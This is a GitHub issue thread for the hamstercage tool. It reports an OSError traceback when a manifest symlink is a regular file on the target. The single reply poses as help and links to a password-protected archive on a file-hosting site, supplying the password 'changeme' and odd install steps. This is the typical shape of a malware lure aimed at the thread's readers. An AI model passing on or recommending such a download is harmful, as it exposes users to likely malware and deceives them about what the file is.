### ISSUE TITLE
Error when manifest specifies link but target is regular

### ISSUE THREAD

**Issue by stblassitude** [hamstercage/hamstercage#2]
When running `hamstercage ls -l` encounters a file that is a link in the manifest, but is a regular file in the target, an exception is raised:
```
$ sudo hamstercage ls -l
Traceback (most recent call last):
  File "/usr/local/bin/hamstercage", line 8, in <module>
    sys.exit(__main__.main())
             ^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/hamstercage/__main__.py", line 630, in main
    sys.exit(h.main())
             ^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/hamstercage/__main__.py", line 180, in main
    return args.func(args)
           ^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/hamstercage/__main__.py", line 305, in list
    if path.exists() and os.readlink(path) != entry.target:
                         ^^^^^^^^^^^^^^^^^
OSError: [Errno 22] Invalid argument: '/etc/rc.conf'
```
This should instead be reported as a metadata mismatch.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
